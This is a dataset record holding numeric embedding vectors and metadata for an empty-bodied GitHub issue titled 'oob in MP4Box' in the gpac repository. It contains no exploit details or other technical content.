-0.02314632013440132, 0.0008447759319096804, 0.002394881332293153, 0.011350045911967754, -0.016683200374245644, -0.02352057583630085, 0.0085071362555027, 0.0012883057352155447, -0.007852187380194664, 0.001587890787050128, -0.008967760019004345, -0.009075718000531197, -0.01187544409185648, 0.004487478639930487, -0.03313608840107918, -0.001567198778502643, 0.02402438409626484, 0.004476682748645544, -0.03702259808778763, -0.002990452805534005, 0.00103820173535496, -0.0021951578091830015, -0.00048356447950936854, -0.01335807517170906, 0.0085575170814991, -0.007413155864924192, -0.0085071362555027, 0.008485544472932816, -0.014797522686421871, 0.02429787814617157, 0.01856887713074684, 0.026183554902672768, 0.0071288649924099445, -0.006718622520565987, 0.0019864379428327084, 0.009867414832115173, -0.0143872806802392, -0.013897867873311043, -0.007931357249617577, -0.007143259514123201, -0.0023750888649374247, 0.010507969185709953, 0.00012775098730344325, -0.01502783503383398, 0.019893167540431023, 0.008377586491405964, -0.0027745356783270836, 0.014056207612156868, 0.0029292763210833073, -0.03362549841403961, -0.002907684538513422, -0.01137163769453764, 0.0034078925382345915, -0.02259933017194271, -0.004080834332853556, -0.013847487978637218, 0.017258979380130768, -0.0028950893320143223, 0.026010820642113686, -0.009845823049545288, -0.01816583052277565, -0.004192391410470009, 0.0010435996809974313, -0.011479595676064491, -0.01953330636024475, 0.007046096958220005, 0.00988180935382843, -0.0007952948799356818, -0.0228872187435627, -0.011717105284333229, -0.029623834416270256, -0.006031285971403122, 0.01766202412545681, 0.005361943040043116, -0.0018011090578511357, 0.007168449927121401, -0.0036813877522945404, -0.010140909813344479, 0.0054087252356112, 0.000010936429134744685, -0.003976474516093731, 0.02841469831764698, -0.020281819626688957, -0.017330951988697052, -0.010587138123810291, 0.012487209402024746, 0.0029112831689417362, 0.00928443856537342, -0.012537590228021145, -0.008384782820940018, -0.0008933572680689394, -0.009932189248502254, -0.0031667849980294704, -0.018784793093800545, 0.028112415224313736, -0.01875600405037403, 0.0012217313051223755, 0.0029022865928709507, 0.0024650543928146362, 0.013552401214838028, 0.009118901565670967, -0.010284854099154472, 0.012429631315171719, 0.005635438021272421, 0.012235306203365326, 0.0060924626886844635, -0.018280986696481705, -0.011062156409025192, -0.010076134465634823, 0.006272393744438887, -0.010579940862953663, -0.029767779633402824, 0.04873970150947571, 0.00009935563139151782, 0.014955862425267696, 0.03638923913240433, -0.014883889816701412, -0.01024886779487133, 0.011155719868838787, -0.002204154385253787, 0.008363191969692707, -0.002538826083764434, -0.006761806085705757, -0.002571213524788618, 0.006099659949541092, 0.007593086920678616, -0.0019468531245365739, -0.0017183407908305526, 0.005275575909763575, -0.014703959226608276, 0.0036166126374155283, 0.014423266984522343, 0.0009707275894470513, 0.01251599844545126, 0.016668805852532387, 0.002060209633782506, 0.0033233249559998512, 0.005746995098888874, 0.02713358961045742, 0.004746579099446535, 0.00561744486913085, -0.041254572570323944, 0.001693150494247675, 0.010644716210663319, -0.014358491636812687, 0.014927073381841183, 0.024873657152056694, -0.00045365095138549805, -0.009363607503473759, 0.01230727881193161, 0.01246561761945486, -0.024628952145576477, -0.0006162635982036591, -0.0006239106296561658, -0.009759455919265747, -0.0022473379503935575, 0.023506181314587593, 0.01399862952530384, 0.011789076961576939, 0.003175781574100256, -0.0031721829436719418, 0.024744106456637383, 0.008888590149581432, 0.014221743680536747, 0.005444711074233055, 0.0029958507511764765, -0.031783007085323334, 0.00851433351635933, 0.022340228781104088, 0.0002680971520021558, -0.006970525719225407, -0.0009563331259414554, -0.018885554745793343, -0.022685697302222252, 0.010068937204778194, 0.003290937514975667, -0.02154853381216526, -0.0010849838145077229, -0.0026773728895932436, 0.011810668744146824, -0.004062841180711985, 0.03126480430364609, 0.01509980671107769, -0.021174276247620583, -0.011753090657293797, -0.008456755429506302, 0.009183676913380623, 0.003836128395050764, -0.005397929344326258, -0.013192539103329182, -0.0009077517315745354, -0.008449558168649673, 0.0076434677466750145, 0.015301330015063286, 0.01940375566482544, -0.013645964674651623, -0.021030332893133163, 0.0005137029220350087, -0.0077010453678667545, 0.011760287918150425, -0.004070038441568613, -0.008492741733789444, -0.0033665085211396217, 0.021073514595627785, 0.011342848651111126, -0.00821204949170351, -0.006491909269243479, -0.02314632013440132, -0.004365125205367804, 0.027522241696715355, 0.0055202823132276535, 0.005988102871924639, -0.0002775435277726501, -0.017215795814990997, -0.009075718000531197, -0.0058801439590752125, 0.0053259567357599735, -0.014624789357185364, -0.00005184260953683406, -0.025694143027067184, -0.008974957279860973, 0.02507518045604229, 0.005505887791514397, 0.002985054859891534, 0.005315160844475031, -0.012688731774687767, 0.025089574977755547, 0.015546035952866077, -0.013336483389139175, -0.011925824917852879, -0.0030786190181970596, -0.01404901035130024, -0.029033660888671875, -0.0015186173841357231, -0.0016292749205604196, 0.0035194498486816883, 0.0059665110893547535, 0.008586306124925613, 0.01875600405037403, 0.021260643377900124, -0.009262846782803535, -0.008039316162467003, -0.00954353902488947, -0.008219246752560139, 0.008571911603212357, 0.012249700725078583, 0.01587710902094841, 0.0029418712947517633, -0.005862151272594929, 0.029393523931503296, -0.012062571942806244, 0.006142843514680862, -0.000934741401579231, 0.051042817533016205, -0.011609146371483803, 0.004357927944511175, -0.0028842934407293797, -0.0036795884370803833, 0.0024704523384571075, -0.016308942809700966, -0.019936351105570793, -0.012695929035544395, 0.016683200374245644, -0.00559225445613265, 0.005322358105331659, -0.011724302545189857, 0.007042498327791691, 0.014826311729848385, 0.010435996577143669, 0.010788661427795887, -0.006707826629281044, 0.005268378648906946, 0.006880560424178839, -0.0022455386351794004, -0.012120150029659271, -0.011285270564258099, 0.007758623454719782, 0.0032045706175267696, -0.00657827639952302, 0.00008462378173135221, 0.0025748121552169323, -0.01766202412545681, -0.0153301190584898, 0.014855100773274899, 0.009694680571556091, -0.022210679948329926, 0.01728776842355728, -0.013120566494762897, 0.02127503789961338, -0.00536554167047143, -0.011493990197777748, 0.018540088087320328, -0.0055202823132276535, 0.021289432421326637, -0.029825357720255852, 0.00875903945416212, 0.030314769595861435, 0.0034096918534487486, -0.01374672632664442, 0.007121667731553316, 0.006923743989318609, -0.004858136177062988, -0.01986437849700451, -0.014826311729848385, 0.01980680227279663, -0.01119170617312193, -0.023938016965985298, 0.012595168314874172, 0.0003013843670487404, -0.006891356315463781, 0.02662978321313858, -0.015071018598973751, -0.010781464166939259, 0.0021519744768738747, -0.016899116337299347, 0.026370683684945107 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
null
oob in MP4Box
https://api.github.com/repos/gpac/gpac/issues/1781/comments
1
2021-05-08T05:10:18
2023-09-22T06:14:10Z
https://github.com/gpac/gpac/issues/1781
880,292,426
1,781
false
This is a GitHub Issue repo:gpac owner:gpac Title : oob in MP4Box Issue date: --- start body --- None --- end body ---
120
[ -0.01777803897857666, 0.032767366617918015, -0.0037321755662560463, 0.02340093068778515, 0.021688297390937805, 0.005952536128461361, -0.020824404433369637, 0.059987619519233704, -0.025507621467113495, 0.02434060536324978, 0.004683217499405146, 0.028341801837086678, 0.04013320431113243, -0.011026021093130112, -0.01783866249024868, -0.00023882609093561769, -0.00055366923334077, 0.00741888303309679, 0.0033722196239978075, -0.019430046901106834, 0.02697775699198246, -0.026811040937900543, -0.022021731361746788, 0.04143662378191948, -0.03328267112374306, 0.021627673879265785, -0.03191862627863884, 0.023613115772604942, -0.007502241525799036, 0.0002998054842464626, -0.004558179993182421, 0.017990224063396454, -0.01764163374900818, 0.027311190962791443, 0.03610169515013695, -0.010442513972520828, 0.05071211978793144, 0.0461956188082695, -0.00910120364278555, -0.009366434998810291, -0.01452706754207611, -0.05189429223537445, -0.018475215882062912, 0.02547730877995491, -0.011041177436709404, 0.011980852112174034, 0.017611322924494743, -0.004402830731123686, -0.031130513176321983, 0.012632561847567558, 0.012488579377532005, -0.025947146117687225, 0.0019333427771925926, -0.038223542273044586, -0.019581608474254608, -0.04137599840760231, 0.02373436465859413, -0.014640738256275654, -0.008449493907392025, 0.03655637800693512, -0.009252764284610748, 0.01404965203255415, 0.0007649065810255706, 0.028523674234747887, -0.010404624044895172, 0.011450390331447124, -0.0006734966882504523, 0.023673739284276962, -0.02309780940413475, 0.03628356754779816, 0.012390065006911755, -0.022142978385090828, 0.005675938446074724, 0.028402425348758698, 0.010935084894299507, -0.0214003324508667, 0.034525465220212936, 0.024264825507998466, -0.03467702865600586, 0.01695961318910122, -0.040406011044979095, 0.02578043006360531, -0.026265423744916916, 0.022112667560577393, -0.011185159906744957, -0.016611022874712944, -0.006820219568908215, -0.061866968870162964, -0.036829184740781784, -0.03231268376111984, -0.007873564958572388, 0.04907526820898056, 0.01789928786456585, 0.004952237010002136, 0.03216112405061722, 0.008449493907392025, -0.010510715655982494, 0.004626382142305374, -0.029402723535895348, -0.017171796411275864, -0.01035915594547987, -0.0158986896276474, 0.007172597572207451, -0.006312491837888956, -0.011935384012758732, 0.0016036988236010075, 0.029251163825392723, -0.022264227271080017, 0.02315843477845192, 0.12621952593326569, 0.024431541562080383, 0.006160931661725044, -0.015004483051598072, 0.0029402724467217922, 0.021324552595615387, 0.025325749069452286, -0.02773555926978588, -0.033070486038923264, -0.030190838500857353, -0.012973573058843613, -0.009669555351138115, 0.001573386718519032, -0.028341801837086678, 0.01608056202530861, -0.003982250578701496, 0.0347982756793499, -0.01627759076654911, 0.0045165009796619415, -0.02434060536324978, 0.014913546852767467, -0.04073944315314293, -0.016368526965379715, 0.03598044812679291, -0.02722025290131569, -0.010654698126018047, 0.0025954723823815584, -0.040709130465984344, 0.017171796411275864, 0.011344298720359802, 0.027871964499354362, -0.05810827016830444, -0.037283867597579956, 0.03510139510035515, 0.005092430394142866, -0.019096614792943, 0.013246381655335426, 0.007987234741449356, -0.02152158133685589, -0.042164113372564316, 0.003160035004839301, -0.00888901948928833, -0.0311002004891634, 0.018323656171560287, 0.019445203244686127, 0.05243990942835808, -0.001508026267401874, 0.013413098640739918, 0.017853818833827972, -0.007100606337189674, -0.02290078066289425, -0.0015279186191037297, -0.034525465220212936, 0.00488024577498436, -0.014549801126122475, -0.01442855317145586, -0.03485890105366707, 0.03913290426135063, 0.020248474553227425, -0.004649116192013025, 0.015156043693423271, 0.008366135880351067, -0.029342100024223328, 0.03331298381090164, 0.02841758169233799, -0.028690390288829803, -0.023704051971435547, 0.019884727895259857, 0.026250267401337624, -0.03513170778751373, -0.015913845971226692, -0.034828588366508484, 0.01996050961315632, 0.015512210316956043, -0.02715962938964367, -0.01498932670801878, -0.007812940515577793, 0.030903171747922897, -0.0317973792552948, 0.028508517891168594, -0.003019841620698571, 0.022264227271080017, -0.0023188746999949217, -0.014655893668532372, -0.01896020956337452, 0.050924304872751236, -0.017944755032658577, -0.06468599289655685, -0.019793791696429253, -0.020854715257883072, 0.008866284973919392, 0.017929598689079285, -0.03410109877586365, 0.02196110598742962, -0.028690390288829803, -0.034889210015535355, -0.00397467240691185, -0.01142765674740076, 0.03422234579920769, -0.0068315863609313965, -0.019642231985926628, -0.026765571907162666, -0.03828416392207146, 0.022961406037211418, 0.01576228439807892, -0.02916022762656212, 0.002616311889141798, -0.03698074445128441, -0.004940870217978954, -0.026932289823889732, -0.0334039181470871, 0.026022925972938538, -0.012064210139214993, 0.03343423083424568, 0.0022734066005796194, -0.030084745958447456, -0.011897494085133076, -0.009351278655230999, 0.005103797651827335, -0.0072673228569328785, 0.027690090239048004, 0.02071831189095974, 0.03613200783729553, 0.001279738382436335, -0.008798083290457726, 0.00533492723479867, 0.04137599840760231, 0.0032282371539622545, -0.0063844830729067326, 0.022688597440719604, -0.0038799471221864223, -0.02441638521850109, 0.03555607795715332, -0.02321905829012394, -0.01070016622543335, 0.00136878015473485, 0.06832344084978104, -0.013928404077887535, 0.006475419271737337, -0.02334030717611313, 0.018748026341199875, 0.006744439247995615, 0.004148966632783413, -0.020627375692129135, 0.016110874712467194, -0.004274004139006138, 0.00752876466140151, 0.030205994844436646, 0.01709601655602455, -0.006073784548789263, -0.02891772985458374, -0.008669257164001465, 0.030994107946753502, -0.0361926332116127, -0.019990820437669754, 0.023870768025517464, -0.03901165723800659, -0.012427955865859985, 0.013890514150261879, -0.014860500581562519, 0.0005948747275397182, 0.0182024072855711, -0.01764163374900818, -0.025249967351555824, 0.007680324837565422, 0.0016823208425194025, -0.006452685222029686, 0.01633821427822113, 0.0029213272500783205, 0.03491952270269394, 0.014655893668532372, -0.028644921258091927, 0.02223391644656658, 0.005702461116015911, -0.011480703018605709, 0.009396746754646301, -0.013291849754750729, 0.010397045873105526, 0.0005148318596184254, -0.014716518111526966, 0.019308799877762794, 0.03161550685763359, 0.03967852145433426, -0.03673825040459633, 0.04407377541065216, -0.0001097629065043293, 0.008851129561662674, -0.0011944856960326433, -0.0021521581802517176, 0.013102399185299873, 0.008555586449801922, -0.00791903305798769, 0.0188995860517025, -0.010048456490039825, -0.02235516346991062, -0.02523481287062168, 0.004592281300574541, -0.019869573414325714, 0.01947551593184471, -0.00857832096517086, -0.016323057934641838, 0.02359795942902565, -0.059805747121572495, -0.027129316702485085, -0.0013829889940097928, -0.007680324837565422, -0.010215173475444317, -0.004827199969440699, -0.026386670768260956, -0.036707937717437744, 0.006357959937304258, -0.01185960415750742, 0.028341801837086678, -0.03913290426135063, 0.0035351470578461885, 0.016929300501942635, -0.010442513972520828, -0.03904196619987488, 0.008813239634037018, -0.03355548158288002, 0.016186654567718506, -0.006717916112393141, -0.020293941721320152, 0.03304017335176468, -0.04983307048678398, 0.02234000712633133, -0.039526961743831635, -0.010722900740802288, -0.02215813472867012, 0.02083955891430378, -0.03191862627863884, -0.000370138994185254, -0.0010505032259970903, 0.03792041912674904, -0.01411785464733839, -0.02973615750670433, -0.03734448924660683, -0.0002541005378589034, -0.006361749023199081, 0.018111471086740494, 0.025644024834036827, 0.0008790505235083401, 0.01758101023733616, 0.00561531400308013, 0.030342398211359978, 0.0401938259601593, 0.010813836939632893, -0.021673141047358513, -0.00882081687450409, 0.024507321417331696, 0.01101844385266304, 0.009207296185195446, -0.03504077345132828, -0.005024228245019913, 0.020263629034161568, -0.0032225537579506636, 0.021794389933347702, -0.0031524570658802986, 0.015284869819879532, 0.014943858608603477, -0.01671711541712284, -0.005486487876623869, 0.0002647571382112801, -0.03434359282255173, 0.03066067583858967, -0.015390962362289429, 0.003131617559120059, 0.018566153943538666, 0.008282777853310108, -0.014383085072040558, -0.0007066504913382232, -0.06880843639373779, 0.02635635994374752, 0.04125475138425827, -0.04989369586110115, -0.002731876913458109, 0.02485591173171997, -0.041527558118104935, 0.031191136687994003, -0.06107885390520096, -0.019187550991773605, -0.02196110598742962, 0.030221151188015938, -0.02785680815577507, -0.05146992206573486, -0.00998025480657816, 0.03234299644827843, -0.05037868767976761, -0.018550997599959373, -0.024067796766757965, -0.02041519060730934, 0.052682407200336456, -0.0317973792552948, 0.03549545258283615, 0.025371216237545013, 0.02341608703136444, 0.04195192828774452, -0.010692588984966278, 0.006608034949749708, 0.0035370416007936, 0.006634558085352182, 0.02628057822585106, -0.00832824595272541, 0.02567433752119541, 0.019945353269577026, 0.022082354873418808, 0.0072862678207457066, 0.0014625581679865718, 0.0010883933864533901, -0.04692310839891434, 0.031827691942453384, -0.008805661462247372, -0.017611322924494743, -0.010290953330695629, -0.004099709913134575, 0.031948938965797424, 0.012102100998163223, 0.00005118124681757763, 0.013011462986469269, 0.034131407737731934, -0.048044655472040176, 0.00014504807768389583, -0.016944456845521927, 0.0006379747064784169, -0.01902083493769169, 0.03173675388097763, -0.019323954358696938, -0.04113350063562393, -0.030069589614868164, -0.01652008667588234, 0.02629573456943035, -0.008691990748047829, 0.04713529348373413, 0.01073805708438158, -0.012412799522280693, 0.05113648995757103, -0.034889210015535355, -0.015466742217540741, -0.031191136687994003, 0.03216112405061722, -0.022885626181960106, 0.016307903453707695, 0.009624087251722813, 0.022734064608812332, 0.006490575615316629, -0.010412202216684818, 0.0052894591353833675, 0.021991418674588203, 0.005149265751242638, 0.03404047340154648, -0.004433142486959696, -0.03504077345132828, -0.0030880437698215246, 0.012693186290562153, 0.0046907952055335045, 0.04249754548072815, -0.01351919025182724, -0.03473765030503273, -0.006752017419785261, 0.005558479111641645, -0.02909960225224495, 0.006596667692065239, -0.003743542591109872, -0.007483296561986208, -0.008214575238525867, 0.011594372801482677, 0.033009860664606094, -0.014792297966778278, 0.0025026416406035423, 0.006937678903341293, -0.03667762503027916, -0.008441915735602379, -0.02002113312482834, -0.004861300811171532, 0.01883896254003048, -0.03255518153309822, -0.015792597085237503, -0.013428254052996635, -0.0054751206189394, 0.007161230314522982, 0.006926311645656824, 0.012912948615849018, 0.013845045119524002, 0.013860201463103294, -0.01764163374900818, 0.013905669562518597, -0.01160952914506197, -0.009222452528774738, 0.014769564382731915, 0.02711416222155094, 0.014383085072040558, 0.00067491753725335, -0.02873585745692253, 0.008252465166151524, 0.020445503294467926, 0.04589249938726425, -0.02728087827563286, -0.010086346417665482, 0.04201255366206169, -0.007608333602547646, -0.0045165009796619415, -0.025113563984632492, -0.027583999559283257, -0.02165798656642437, -0.03995133191347122, -0.02097596414387226, -0.026492763310670853, 0.018808649852871895, -0.009601353667676449, 0.05140930041670799, 0.005065907258540392, -0.028766170144081116, 0.007596966810524464, -0.009654399938881397, 0.02811446040868759, -0.0013886725064367056, 0.022173291072249413, 0.005804764572530985, -0.013814733363687992, 0.010722900740802288, 0.00009851428330875933, -0.0331917330622673, -0.013814733363687992, -0.013375207781791687, 0.03325235843658447, -0.03185800462961197, 0.00017879395454656333, -0.004186857026070356, 0.000011426235687395092, -0.003216870129108429, -0.019172394648194313, -0.03231268376111984, 0.037890106439590454, -0.008843551389873028, 0.014064808376133442, -0.009442214854061604, 0.03561670333147049, -0.0015430746134370565, 0.013163023628294468, -0.020703155547380447, -0.0008132164366543293, -0.007229432463645935, -0.011162426322698593, 0.008911753073334694, 0.04413439705967903, 0.015140887349843979, 0.007043770980089903, -0.003584404243156314, 0.02922085113823414, 0.007259744685143232, 0.01952098309993744, -0.002930799964815378, 0.03467702865600586, 0.010192438960075378, -0.01583806611597538, 0.009563463740050793, -0.008063014596700668, 0.0024268613196909428, 0.01442855317145586, -0.020172692835330963, -0.0020081757102161646, 0.015383384190499783, -0.007237010635435581, 0.03373735398054123, -0.001116810948587954, 0.02223391644656658, -0.007153652608394623, 0.026401827111840248, -0.0007265428430400789, -0.008570742793381214, -0.014390663243830204, 0.0016169603914022446, -0.01833881251513958, 0.0008373713935725391, -0.010533450171351433, 0.0005465648137032986, -0.01752038672566414, 0.016201810911297798, -0.0057517183013260365, -0.035465139895677567, -0.0063655381090939045, -0.003127828473225236, 0.019172394648194313, -0.002532953629270196, -0.02621995471417904, 0.008563164621591568, -0.04186099022626877, -0.00016304587188642472, 0.026204798370599747, 0.008623789064586163, 0.0072824787348508835, -0.01997566595673561, 0.03622294217348099, -0.018808649852871895, -0.019248174503445625, -0.04298253729939461, 0.009624087251722813, 0.011132113635540009, 0.005634258966892958, -0.03989070653915405, 0.033646415919065475, -0.005486487876623869, 0.016671648249030113, 0.05171241983771324, -0.018232719972729683, 0.0034555778838694096, -0.0008653153199702501, 0.026129018515348434, -0.007911454886198044, 0.0002690197725314647, 0.005842654500156641, 0.017262732610106468, -0.04195192828774452, 0.023992016911506653, -0.021688297390937805, 0.01933911070227623, 0.028569141402840614, -0.016504930332303047, -0.027083849534392357, -0.002667463617399335, -0.003281283425167203, -0.036586686968803406, 0.03725355491042137, -0.00832824595272541, -0.036586686968803406, -0.029584595933556557, 0.006297335959970951, 0.03625325486063957, -0.013602549210190773, -0.01670195907354355, -0.0016737955156713724, -0.005236412864178419, 0.010321265086531639, -0.01921786367893219, 0.006460263393819332, -0.011215471662580967, 0.01452706754207611, 0.0001162752669188194, -0.015201511792838573, 0.01576228439807892, 0.017990224063396454, -0.0351923331618309, -0.03128207474946976, -0.015883533284068108, 0.004679428413510323, 0.007684113923460245, -0.008843551389873028, 0.025507621467113495, 0.051166802644729614, -0.026614012196660042, -0.02959975227713585, -0.0024836966767907143, -0.043103788048028946, 0.0063503822311758995, -0.012526470236480236, -0.006376905366778374, -0.0023453976027667522, -0.008972377516329288, -0.0000430703948950395, -0.03197925165295601, -0.004035296384245157, 0.018672244623303413, -0.021809546276926994, 0.03655637800693512, -0.017005080357193947, -0.010268219746649265, -0.005456175655126572, -0.009245186112821102, -0.012435533106327057, 0.016550399363040924, 0.010450092144310474, 0.006119252648204565, -0.009775647893548012, 0.0011925911530852318, -0.00449376692995429, -0.015929002314805984, 0.003531358204782009, -0.012458267621695995, -0.016307903453707695, -0.014618003740906715, -0.004092131741344929, 0.02723540924489498, 0.011389766819775105, 0.005797186400741339, 0.05647141858935356, -0.023370618000626564, -0.028872262686491013, 0.021809546276926994, -0.008866284973919392, 0.003620399860665202, -0.004952237010002136, -0.031069889664649963, 0.01645946316421032, -0.0034233713522553444, -0.022764377295970917, -0.0016880043549463153, 0.014731674455106258, -0.0009785119909793139, -0.002527270233258605, 0.024143576622009277, -0.0052894591353833675, 0.002536742715165019, 0.019566452130675316, -0.015747129917144775, 0.021370021626353264, -0.01803569123148918, -0.009722601622343063, 0.008926909416913986, -0.026341203600168228, -0.0015838064718991518, 0.02109721302986145, -0.02135486528277397, -0.03961789608001709, -0.02547730877995491, -0.007146074436604977, 0.008100905455648899, 0.01452706754207611, -0.005710039287805557, 0.0058843339793384075, 0.03367672860622406, 0.007324157748371363, -0.03655637800693512, -0.02497715875506401, -0.0008103746804408729, 0.014383085072040558, -0.006126830354332924, 0.032949239015579224, -0.006861898582428694, 0.00417927885428071, 0.015284869819879532, 0.013352474197745323, 0.0016415889840573072, 0.0037018635775893927, -0.013966294005513191, -0.03688981011509895, -0.005645626224577427, -0.02371920831501484, 0.01783866249024868, -0.011253362521529198, -0.02917538397014141, 0.001913450425490737, 0.023552490398287773, 0.03828416392207146, 0.0037662768736481667, -0.04125475138425827, -0.006145775783807039, -0.032009564340114594, 0.03567732498049736, 0.004683217499405146, 0.016747428104281425, -0.01858130842447281, 0.02109721302986145, -0.02421935647726059, 0.014193634502589703, -0.0016529560089111328, -0.015065107494592667, -0.004728685598820448, 0.012503735721111298, -0.014875656925141811, 0.018732869997620583, -0.029645221307873726, 0.008252465166151524, -0.019354267045855522, -0.02152158133685589, -0.013625282794237137, 0.012594671919941902, -0.007835674099624157, -0.02309780940413475, 0.01921786367893219, 0.018869273364543915, -0.02097596414387226, -0.030690988525748253, 0.006846742704510689, -0.05250053480267525, 0.031706441193819046, 0.014754408039152622, -0.028690390288829803, 0.016792895272374153, -0.0007791153620928526, -0.01689898781478405, 0.009608931839466095, 0.015049951151013374, -0.011154848150908947, 0.034131407737731934, -0.028766170144081116, -0.021733766421675682, -0.003826900850981474, 0.017868975177407265, -0.0009804065339267254, 0.012571938335895538, 0.0034423163160681725, 0.0009093625703826547, 0.022627972066402435, -0.018990522250533104, -0.03343423083424568, -0.022446099668741226, -0.007199120707809925, -0.026826197281479836, 0.021627673879265785, -0.0007047560065984726, 0.012056632898747921, -0.007744737900793552, 0.006986936088651419, 0.00788114219903946, -0.020172692835330963, -0.0011726988013833761, 0.00633901497349143, 0.014307305216789246, -0.02473466284573078, -0.011495858430862427, 0.03343423083424568, -0.03246424347162247, 0.005600158125162125, -0.007002091966569424, -0.05225803703069687, 0.04410408437252045, -0.048923708498477936, 0.006733072455972433, 0.011753511615097523, 0.01576228439807892, 0.022082354873418808, -0.01026064157485962, 0.005664571188390255, -0.013026619330048561, -0.0016444306820631027, -0.01433003880083561, 0.0341920331120491, 0.005990426056087017, -0.01695961318910122, 0.008995112031698227, 0.01903599128127098, -0.05683516338467598, -0.00763485673815012, -0.014034495688974857, -0.048469025641679764, 0.005694883409887552, -0.009487682953476906, 0.014534645713865757, -0.010821415111422539, 0.014367928728461266, 0.010025722905993462, 0.01946035958826542, 0.015625881031155586, -0.0034101097844541073, 0.024810442700982094, 0.0017448394792154431, -0.0071081845089793205, -0.017929598689079285, -0.0033153844997286797, 0.020794091746211052, -0.0027375603094697, 0.037768859416246414, 0.0012030109064653516, -0.016050249338150024, 0.0018604042707011104, 0.001005035126581788, -0.001447402173653245, 0.005134109873324633, -0.05571361631155014, -0.021506424993276596, -0.02635635994374752, -0.023082653060555458, -0.008775348775088787, -0.0018840855918824673, 0.026113862171769142, -0.014792297966778278, 0.028553985059261322, -0.008366135880351067, 0.003230131696909666, -0.0024192833807319403, -0.004133810754865408, -0.005342505406588316, 0.030281774699687958, -0.012306706979870796, -0.031130513176321983, 0.026507919654250145, -0.009502839297056198, 0.025765273720026016, -0.04186099022626877, -0.043225035071372986, -0.003783327294513583, 0.008585898205637932, -0.008350979536771774, -0.024234512820839882, -0.010351577773690224, 0.010927507653832436, 0.02617448754608631, -0.010442513972520828, -0.02811446040868759, 0.007157441228628159, -0.004539235029369593, -0.018475215882062912, -0.00976049154996872, 0.02102143131196499, -0.008373714052140713, -0.014026918448507786, -0.009146671742200851, 0.040284764021635056, 0.023673739284276962, -0.012708342634141445, 0.0255985576659441, 0.019490672275424004, -0.005441019777208567, -0.018005378544330597, -0.02909960225224495, -0.014420974999666214, -0.016307903453707695, -0.02473466284573078, 0.016929300501942635, 0.01233701966702938, 0.05337958410382271, -0.0011291252449154854, 0.0024495956022292376, 0.004721107427030802, 0.027629466727375984, 0.023249370977282524, -0.015868376940488815, -0.017505230382084846, 0.011624685488641262, -0.0007274900563061237, 0.013996605761349201, 0.004630171228200197, -0.015565256588160992, -0.013989027589559555, 0.024992315098643303, 0.01789928786456585, 0.006141986697912216, 0.014640738256275654, -0.02265828475356102, -0.004111076705157757, -0.03925415128469467, 0.0039064702577888966, 0.014254258945584297, -0.0022601450327783823, -0.00039784613181836903, -0.003211186733096838, 0.037708234041929245, -0.01815694011747837, 0.002993318485096097, -0.02535605989396572, -0.032403621822595596, -0.021688297390937805, -0.012609828263521194, -0.011412500403821468, -0.034525465220212936, -0.028644921258091927, 0.03792041912674904, -0.0062177665531635284, 0.020233318209648132, -0.036010757088661194, 0.003332434920594096, -0.006467841565608978, 0.023052342236042023, -0.004001195542514324, -0.024022327736020088, 0.010662276297807693, 0.01933911070227623, -0.0321914367377758, 0.005910857114940882, -0.033949535340070724, -0.035525765269994736, 0.0036507118493318558, -0.0182024072855711, -0.014890812337398529, 0.06535285711288452, 0.004126232583075762, 0.05086367949843407, -0.007551498711109161, -0.013307006098330021, -0.016550399363040924, -0.01111695822328329, 0.018687400966882706, -0.032009564340114594, 0.013049352914094925, -0.005698672495782375, -0.026523075997829437, 0.011389766819775105, 0.016474619507789612, 0.002978162607178092, -0.0020593274384737015, -0.022506725043058395, 0.01261740643531084, 0.008320667780935764, 0.023234214633703232, -0.052288349717855453, 0.0387994721531868, -0.00578960869461298, 0.012261238880455494, -0.025931989774107933, -0.029387567192316055, -0.03443453088402748, -0.04474063962697983, -0.016868676990270615, -0.013367630541324615, 0.01135945413261652, -0.004251270089298487, -0.004796887747943401, 0.01226881705224514, 0.0005503538413904607, -0.01142765674740076, 0.020354565232992172, 0.003895103232935071, -0.006926311645656824, -0.010578918270766735, 0.006967991124838591, -0.01126093976199627, 0.017929598689079285, -0.03167613223195076, 0.005039384588599205, 0.004141388926655054, 0.045225631445646286, -0.002466646023094654, -0.024128420278429985, 0.001083657145500183, 0.016050249338150024, 0.01045767031610012, 0.03598044812679291, -0.013420676812529564, 0.009108781814575195, 0.023112965747714043, 0.02003628946840763, 0.005797186400741339, -0.013367630541324615, -0.0075742327608168125, 0.02773555926978588, -0.01001056656241417, -0.014655893668532372, 0.017186952754855156, -0.0183994360268116, -0.014686206355690956, 0.0076045445166528225, 0.02621995471417904, 0.0010078768245875835, -0.04946932569146156, -0.018490372225642204, -0.002824707655236125, 0.008244887925684452, 0.010397045873105526, 0.017126329243183136, 0.009154249913990498, -0.0015838064718991518, 0.01615634188055992, -0.00010165205458179116, 0.04449814185500145, -0.0183994360268116, -0.0058994898572564125, -0.006016949191689491, -0.0035635647363960743, 0.02183985896408558, 0.020430346950888634, 0.0012873164378106594, -0.021172992885112762, -0.024764975532889366, 0.02347671054303646, -0.03810229152441025, -0.0220975112169981, -0.028068991377949715, -0.0013299428392201662, 0.01386777963489294, 0.009768069721758366, 0.015792597085237503, 0.011101801879703999, 0.023143278434872627, -0.015444007702171803, -0.01689898781478405, 0.011632263660430908, -0.017293045297265053, 0.023022029548883438, -0.006967991124838591, -0.006789907347410917, -0.022749220952391624, 0.012291551567614079, -0.023022029548883438, 0.0021066900808364153, 0.003853423986583948, -0.05350083112716675, 0.0074454061686992645, 0.006626979913562536, -0.026447296142578125, 0.013473722152411938, -0.01483776606619358, -0.026386670768260956, -0.027583999559283257, -0.020233318209648132, -0.040709130465984344, -0.02953912876546383, 0.00043952526175417006, 0.021324552595615387, 0.05134867504239082, 0.04095162823796272, -0.014223946258425713, -0.0017997801769524813, -0.01815694011747837, -0.0018632460851222277, -0.0063844830729067326, 0.0057214065454900265, 0.0018831384368240833, 0.003690496552735567, 0.034404218196868896, -0.00122858677059412, -0.009055735543370247, -0.0195967648178339, 0.015375806018710136, 0.007498452439904213, -0.0030690988060086966, -0.00599421514198184, -0.0026182064320892096, 0.010412202216684818, -0.0054334416054189205, 0.016989924013614655, 0.02415873296558857, -0.013125133700668812, -0.004713529255241156, -0.008343402296304703, 0.009427058510482311, -0.00916940625756979, -0.011632263660430908, 0.0040618195198476315, -0.009571040980517864, 0.00031306702294386923, -0.018945053219795227, 0.005225046072155237, 0.02729603461921215, -0.009328545071184635, 0.014489177614450455, -0.014845344237983227, -0.005653203930705786, -0.00037345438613556325, 0.010056034661829472, 0.0014710834948346019, -0.007146074436604977, -0.021248772740364075, -0.0051606325432658195, -0.030721299350261688, 0.03807198256254196, 